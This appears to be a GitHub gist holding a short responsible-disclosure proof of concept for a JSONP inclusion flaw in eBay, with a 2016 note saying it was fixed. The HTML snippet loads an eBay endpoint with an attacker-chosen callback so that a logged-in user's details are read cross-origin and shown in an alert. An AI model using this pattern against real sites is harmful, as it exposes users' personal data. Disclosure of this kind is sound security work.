Last active
March 14, 2016 00:44
-
-
Save toufik-airane/9db58eee8d046f16253a to your computer and use it in GitHub Desktop.
Ebay JSONP Inclusion Responsible Disclosure
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- | |
| 1 * Connect to Ebay | |
| 2 * Execute this snippet | |
| 3 * leak personal informations | |
| UPDATE 14/03/2016: Bug fixed | |
| Thank you for joined eBay Security Researchers Hall Of Fame | |
| http://ebay.com/securitycenter/ResearchersAcknowledgement.html | |
| --> | |
| <script> | |
| function mycallback(data) { | |
| alert("Hello " + data.u + " "); | |
| } | |
| </script> | |
| <script src="http://my.ebay.com/ws/eBayISAPI.dll?GetGHNotificationsCommand&ghud=1&callback=mycallback"></script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment